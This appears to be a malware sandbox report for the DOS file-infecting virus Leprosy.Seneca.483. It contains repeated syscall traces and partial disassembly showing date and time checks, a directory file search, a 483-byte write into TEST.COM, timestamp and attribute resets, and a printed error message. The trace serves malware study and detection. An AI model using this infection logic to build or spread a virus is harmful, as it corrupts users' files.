Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Seneca.483.a

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:43.995007732Z 42 PC: 12a73 | Get date 0x12a73: cmp cx, 0x7bc
0x12a77: jle 0x12a87
0x12a79: jmp 0x12a7b
0x12a7b: mov ah, 0x2a
0x12a7d: int 0x21
0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
2018-12-17T22:51:43.998528639Z 42 PC: 12a7f | Get date 0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
0x12aa2: mov ah, 0x3b
0x12aa4: int 0x21
0x12aa6: jb 0x12aec
0x12aa8: jmp 0x12a92
0x12aaa: push ax
2018-12-17T22:51:44.001491268Z 78 PC: 12a9b | Find first file
2018-12-17T22:51:44.008509819Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.014371844Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.017754245Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.028387208Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.034616406Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.038118951Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.042467274Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.049003278Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.051585694Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.054563839Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.059982806Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.062024906Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.065171829Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.07583011Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.078398136Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.081985245Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.08805887Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.090322969Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.103074267Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.109180202Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.111476368Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.115974781Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.123347669Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.125642303Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.129736182Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-17T22:51:44.135823496Z 62 PC: 12b29 | Close file
2018-12-17T22:51:44.138125257Z 61 PC: 12b3a | Open file (Filename = 'TEST.COM')
2018-12-17T22:51:44.156577994Z 64 PC: 12a6b | Write file or device (Write 483 bytes on handle 2)
2018-12-17T22:51:44.16092406Z 87 PC: 12b4e | Get or set file date and time
2018-12-17T22:51:44.16306871Z 62 PC: 12b56 | Close file
2018-12-17T22:51:44.186150505Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T22:51:44.20313243Z 79 PC: 12aba | Find next file
2018-12-17T22:51:44.207129084Z 59 PC: 12aa6 | Change current directory
2018-12-17T22:51:44.212219981Z 44 PC: 12af0 | Get time 0x12af0: cmp dh, 0xa
0x12af3: ja 0x12afb
0x12af5: mov bx, 0x2ae
0x12af8: call 0x22acd
0x12afb: int 0x20
0x12afd: mov bx, 0x80
0x12b00: mov ax, word ptr [bx + 0x15]
0x12b03: mov word ptr [0x2db], ax
0x12b06: mov ax, word ptr [bx + 0x16]
0x12b09: mov word ptr [0x2dd], ax
0x12b0c: mov ax, word ptr [bx + 0x18]
0x12b0f: mov word ptr [0x2df], ax
0x12b12: mov ax, word ptr [bx + 0x1a]
0x12b15: mov word ptr [0x2e1], ax
0x12b18: mov al, 2
0x12b1a: mov ah, 0x3d
0x12b1c: int 0x21
0x12b1e: mov word ptr [0x2e3], ax
0x12b21: mov bx, word ptr [0x2e3]
0x12b25: mov ah, 0x3e
2018-12-17T22:51:44.21620721Z 2 PC: 12adb | Character output (Char = '0d')
2018-12-17T22:51:44.218852481Z 2 PC: 12adb | Character output (Char = '0a')
2018-12-17T22:51:44.22340919Z 2 PC: 12adb | Character output (Char = '46')
2018-12-17T22:51:44.226525794Z 2 PC: 12adb | Character output (Char = '41')
2018-12-17T22:51:44.229007119Z 2 PC: 12adb | Character output (Char = '54')
2018-12-17T22:51:44.231478975Z 2 PC: 12adb | Character output (Char = '41')
2018-12-17T22:51:44.235719819Z 2 PC: 12adb | Character output (Char = '4c')
2018-12-17T22:51:44.2418331Z 2 PC: 12adb | Character output (Char = '20')
2018-12-17T22:51:44.24454518Z 2 PC: 12adb | Character output (Char = '45')
2018-12-17T22:51:44.248329517Z 2 PC: 12adb | Character output (Char = '52')
2018-12-17T22:51:44.251482662Z 2 PC: 12adb | Character output (Char = '52')
2018-12-17T22:51:44.254268002Z 2 PC: 12adb | Character output (Char = '4f')
2018-12-17T22:51:44.257745671Z 2 PC: 12adb | Character output (Char = '52')
2018-12-17T22:51:44.260837341Z 2 PC: 12adb | Character output (Char = '20')
2018-12-17T22:51:44.27853477Z 2 PC: 12adb | Character output (Char = '2d')
2018-12-17T22:51:44.282124855Z 2 PC: 12adb | Character output (Char = '2d')
2018-12-17T22:51:44.285161857Z 2 PC: 12adb | Character output (Char = '20')
2018-12-17T22:51:44.287621229Z 2 PC: 12adb | Character output (Char = '45')
2018-12-17T22:51:44.29053766Z 2 PC: 12adb | Character output (Char = '58')
2018-12-17T22:51:44.294272492Z 2 PC: 12adb | Character output (Char = '45')
2018-12-17T22:51:44.296817825Z 2 PC: 12adb | Character output (Char = '20')
2018-12-17T22:51:44.299485031Z 2 PC: 12adb | Character output (Char = '69')
2018-12-17T22:51:44.303018646Z 2 PC: 12adb | Character output (Char = '73')
2018-12-17T22:51:44.305701129Z 2 PC: 12adb | Character output (Char = '20')
2018-12-17T22:51:44.308355474Z 2 PC: 12adb | Character output (Char = '46')
2018-12-17T22:51:44.311860478Z 2 PC: 12adb | Character output (Char = '75')
2018-12-17T22:51:44.314842716Z 2 PC: 12adb | Character output (Char = '63')
2018-12-17T22:51:44.317448319Z 2 PC: 12adb | Character output (Char = '6b')
2018-12-17T22:51:44.320283811Z 2 PC: 12adb | Character output (Char = '65')
2018-12-17T22:51:44.323699519Z 2 PC: 12adb | Character output (Char = '64')
2018-12-17T22:51:44.326357951Z 2 PC: 12adb | Character output (Char = '21')
2018-12-17T22:51:44.328977619Z 2 PC: 12adb | Character output (Char = '21')
2018-12-17T22:51:44.332798067Z 2 PC: 12adb | Character output (Char = '21')
2018-12-17T22:51:44.335751391Z 2 PC: 12adb | Character output (Char = '0d')
2018-12-17T22:51:44.338460978Z 2 PC: 12adb | Character output (Char = '0a')
2018-12-17T22:51:44.344304449Z 2 PC: 12adb | Character output (Char = '0d')
2018-12-17T22:51:44.349364007Z 2 PC: 12adb | Character output (Char = '0a')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":11,"TimeBased":true,"OriginalID":10659,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:46.43267527Z 42 PC: 12a73 | Get date 0x12a73: cmp cx, 0x7bc
0x12a77: jle 0x12a87
0x12a79: jmp 0x12a7b
0x12a7b: mov ah, 0x2a
0x12a7d: int 0x21
0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
2018-12-25T12:28:46.435748307Z 44 PC: 12a8b | Get time 0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
0x12aa2: mov ah, 0x3b
0x12aa4: int 0x21
0x12aa6: jb 0x12aec
0x12aa8: jmp 0x12a92
0x12aaa: push ax
0x12aab: push bx
0x12aac: mov bx, 0x25d
0x12aaf: call 0x12acd
0x12ab2: pop bx
0x12ab3: pop ax
2018-12-25T12:28:46.437825559Z 78 PC: 12a9b | Find first file
2018-12-25T12:28:46.443633785Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-25T12:28:46.448452873Z 62 PC: 12b29 | Close file
2018-12-25T12:28:46.452555537Z 79 PC: 12aba | Find next file
2018-12-25T12:28:46.454801029Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.460045115Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.462049064Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.464386672Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.469126987Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.471060137Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.474269051Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.479295885Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.48430542Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.486772676Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.491539494Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.493376181Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.495739885Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.500579491Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.502465234Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.506905758Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.511727743Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.518412638Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.521121486Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.526286735Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.528859535Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.531381113Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.538358799Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.540214469Z 61 PC: 12b3a | Open file (Filename = 'TEST.COM')
2018-12-25T12:28:46.546930533Z 64 PC: 12a6b | Write file or device (Write 483 bytes on handle 2)
2018-12-25T12:28:46.549858174Z 87 PC: 12b4e | Get or set file date and time
2018-12-25T12:28:46.552837832Z 62 PC: 12b56 | Close file
2018-12-25T12:28:46.565958335Z 67 PC: 12b63 | Get or set file attributes
2018-12-25T12:28:46.570537785Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.573315307Z 59 PC: 12aa6 | Change current directory
2018-12-25T12:28:46.577172123Z 44 PC: 12af0 | Get time 0x12af0: cmp dh, 0xa
0x12af3: ja 0x12afb
0x12af5: mov bx, 0x2ae
0x12af8: call 0x22acd
0x12afb: int 0x20
0x12afd: mov bx, 0x80
0x12b00: mov ax, word ptr [bx + 0x15]
0x12b03: mov word ptr [0x2db], ax
0x12b06: mov ax, word ptr [bx + 0x16]
0x12b09: mov word ptr [0x2dd], ax
0x12b0c: mov ax, word ptr [bx + 0x18]
0x12b0f: mov word ptr [0x2df], ax
0x12b12: mov ax, word ptr [bx + 0x1a]
0x12b15: mov word ptr [0x2e1], ax
0x12b18: mov al, 2
0x12b1a: mov ah, 0x3d
0x12b1c: int 0x21
0x12b1e: mov word ptr [0x2e3], ax
0x12b21: mov bx, word ptr [0x2e3]
0x12b25: mov ah, 0x3e

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":11,"TimeBased":true,"OriginalID":10659,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:46.500015868Z 42 PC: 12a73 | Get date 0x12a73: cmp cx, 0x7bc
0x12a77: jle 0x12a87
0x12a79: jmp 0x12a7b
0x12a7b: mov ah, 0x2a
0x12a7d: int 0x21
0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
2018-12-25T12:28:46.502583564Z 44 PC: 12a8b | Get time 0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
0x12aa2: mov ah, 0x3b
0x12aa4: int 0x21
0x12aa6: jb 0x12aec
0x12aa8: jmp 0x12a92
0x12aaa: push ax
0x12aab: push bx
0x12aac: mov bx, 0x25d
0x12aaf: call 0x12acd
0x12ab2: pop bx
0x12ab3: pop ax
2018-12-25T12:28:46.505130576Z 78 PC: 12a9b | Find first file
2018-12-25T12:28:46.512766208Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-25T12:28:46.518893436Z 62 PC: 12b29 | Close file
2018-12-25T12:28:46.52079738Z 79 PC: 12aba | Find next file
2018-12-25T12:28:46.523480072Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.530303205Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.532021643Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.534721639Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.540504436Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.542012921Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.544881843Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.557986488Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.56093522Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.568586741Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.575439704Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.577198962Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.579996104Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.585728363Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.587417152Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.590207693Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.59576719Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.597576815Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.600545332Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.606098083Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.608170492Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.609975988Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.616983382Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.618824847Z 61 PC: 12b3a | Open file (Filename = 'TEST.COM')
2018-12-25T12:28:46.62658156Z 64 PC: 12a6b | Write file or device (Write 483 bytes on handle 2)
2018-12-25T12:28:46.631302695Z 87 PC: 12b4e | Get or set file date and time
2018-12-25T12:28:46.633093364Z 62 PC: 12b56 | Close file
2018-12-25T12:28:46.646584942Z 67 PC: 12b63 | Get or set file attributes
2018-12-25T12:28:46.651670169Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.654819286Z 59 PC: 12aa6 | Change current directory
2018-12-25T12:28:46.659363924Z 44 PC: 12af0 | Get time 0x12af0: cmp dh, 0xa
0x12af3: ja 0x12afb
0x12af5: mov bx, 0x2ae
0x12af8: call 0x22acd
0x12afb: int 0x20
0x12afd: mov bx, 0x80
0x12b00: mov ax, word ptr [bx + 0x15]
0x12b03: mov word ptr [0x2db], ax
0x12b06: mov ax, word ptr [bx + 0x16]
0x12b09: mov word ptr [0x2dd], ax
0x12b0c: mov ax, word ptr [bx + 0x18]
0x12b0f: mov word ptr [0x2df], ax
0x12b12: mov ax, word ptr [bx + 0x1a]
0x12b15: mov word ptr [0x2e1], ax
0x12b18: mov al, 2
0x12b1a: mov ah, 0x3d
0x12b1c: int 0x21
0x12b1e: mov word ptr [0x2e3], ax
0x12b21: mov bx, word ptr [0x2e3]
0x12b25: mov ah, 0x3e

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10659,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:46.792113827Z 42 PC: 12a73 | Get date 0x12a73: cmp cx, 0x7bc
0x12a77: jle 0x12a87
0x12a79: jmp 0x12a7b
0x12a7b: mov ah, 0x2a
0x12a7d: int 0x21
0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
2018-12-25T12:28:46.794588891Z 44 PC: 12a8b | Get time 0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
0x12aa2: mov ah, 0x3b
0x12aa4: int 0x21
0x12aa6: jb 0x12aec
0x12aa8: jmp 0x12a92
0x12aaa: push ax
0x12aab: push bx
0x12aac: mov bx, 0x25d
0x12aaf: call 0x12acd
0x12ab2: pop bx
0x12ab3: pop ax
2018-12-25T12:28:46.797098795Z 78 PC: 12a9b | Find first file
2018-12-25T12:28:46.803023731Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-25T12:28:46.808769811Z 62 PC: 12b29 | Close file
2018-12-25T12:28:46.810730094Z 79 PC: 12aba | Find next file
2018-12-25T12:28:46.813311179Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.823377255Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.825518808Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.829422756Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.835671051Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.837142408Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.841638999Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.844981642Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.851236741Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.852934108Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.856574455Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.860387604Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.862112818Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.865209046Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.867476824Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.869622867Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.872775767Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.874811379Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.876985422Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.883045869Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.885123819Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.89147825Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:46.901445663Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:46.90688038Z 61 PC: 12b3a | Open file (Filename = 'TEST.COM')
2018-12-25T12:28:46.919296191Z 64 PC: 12a6b | Write file or device (Write 483 bytes on handle 2)
2018-12-25T12:28:46.926464748Z 87 PC: 12b4e | Get or set file date and time
2018-12-25T12:28:46.929087973Z 62 PC: 12b56 | Close file
2018-12-25T12:28:46.943444473Z 67 PC: 12b63 | Get or set file attributes
2018-12-25T12:28:46.948212834Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:46.950674174Z 59 PC: 12aa6 | Change current directory
2018-12-25T12:28:46.955763573Z 44 PC: 12af0 | Get time 0x12af0: cmp dh, 0xa
0x12af3: ja 0x12afb
0x12af5: mov bx, 0x2ae
0x12af8: call 0x22acd
0x12afb: int 0x20
0x12afd: mov bx, 0x80
0x12b00: mov ax, word ptr [bx + 0x15]
0x12b03: mov word ptr [0x2db], ax
0x12b06: mov ax, word ptr [bx + 0x16]
0x12b09: mov word ptr [0x2dd], ax
0x12b0c: mov ax, word ptr [bx + 0x18]
0x12b0f: mov word ptr [0x2df], ax
0x12b12: mov ax, word ptr [bx + 0x1a]
0x12b15: mov word ptr [0x2e1], ax
0x12b18: mov al, 2
0x12b1a: mov ah, 0x3d
0x12b1c: int 0x21
0x12b1e: mov word ptr [0x2e3], ax
0x12b21: mov bx, word ptr [0x2e3]
0x12b25: mov ah, 0x3e
2018-12-25T12:28:46.958292232Z 2 PC: 12adb | Character output (Char = '0d')
2018-12-25T12:28:46.960727658Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.965437877Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.967827521Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.970796774Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.973979332Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.976448296Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.978908254Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.982175383Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.984887641Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.987309491Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:46.999085417Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.002228735Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.004372774Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.006998427Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.009225663Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.011886568Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.014525579Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.016703754Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.019251413Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.021911187Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.024356776Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.026462513Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.02897886Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.031963165Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.034076625Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.037161485Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.040654015Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.044351065Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.046424591Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.049005643Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.051238778Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.053397719Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.055944231Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.057877787Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.061327331Z 2 PC: 12adb | Character output (See above)
2018-12-25T12:28:47.063890419Z 2 PC: 12adb | Character output (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10659,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:47.121257401Z 42 PC: 12a73 | Get date 0x12a73: cmp cx, 0x7bc
0x12a77: jle 0x12a87
0x12a79: jmp 0x12a7b
0x12a7b: mov ah, 0x2a
0x12a7d: int 0x21
0x12a7f: cmp dx, 0xb19
0x12a83: je 0x12ac1
0x12a85: jmp 0x12a92
0x12a87: mov ah, 0x2c
0x12a89: int 0x21
0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
2018-12-25T12:28:47.123882929Z 44 PC: 12a8b | Get time 0x12a8b: cmp cl, 0x1e
0x12a8e: jge 0x12aaa
0x12a90: jmp 0x12a92
0x12a92: mov dx, 0x2d4
0x12a95: mov ah, 0x4e
0x12a97: xor cx, cx
0x12a99: int 0x21
0x12a9b: jb 0x12a9f
0x12a9d: jmp 0x12afd
0x12a9f: mov dx, 0x2d8
0x12aa2: mov ah, 0x3b
0x12aa4: int 0x21
0x12aa6: jb 0x12aec
0x12aa8: jmp 0x12a92
0x12aaa: push ax
0x12aab: push bx
0x12aac: mov bx, 0x25d
0x12aaf: call 0x12acd
0x12ab2: pop bx
0x12ab3: pop ax
2018-12-25T12:28:47.125782737Z 78 PC: 12a9b | Find first file
2018-12-25T12:28:47.131457605Z 61 PC: 12b1e | Open file (Filename = '*.*')
2018-12-25T12:28:47.137576102Z 62 PC: 12b29 | Close file
2018-12-25T12:28:47.139141869Z 79 PC: 12aba | Find next file
2018-12-25T12:28:47.141424213Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.146679255Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.148011092Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.150217891Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.155435964Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.15896546Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.161383013Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.166682291Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.168021495Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.170330505Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.175196844Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.176528462Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.178885414Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.184029271Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.185334858Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.187721861Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.192573011Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.194262925Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.196680013Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.201585448Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.202834013Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:28:47.20447762Z 61 PC: 12b1e | Open file (See above)
2018-12-25T12:28:47.207895587Z 62 PC: 12b29 | Close file (See above)
2018-12-25T12:28:47.209640027Z 61 PC: 12b3a | Open file (Filename = 'TEST.COM')
2018-12-25T12:28:47.216095505Z 64 PC: 12a6b | Write file or device (Write 483 bytes on handle 2)
2018-12-25T12:28:47.218805484Z 87 PC: 12b4e | Get or set file date and time
2018-12-25T12:28:47.220385148Z 62 PC: 12b56 | Close file
2018-12-25T12:28:47.233316412Z 67 PC: 12b63 | Get or set file attributes
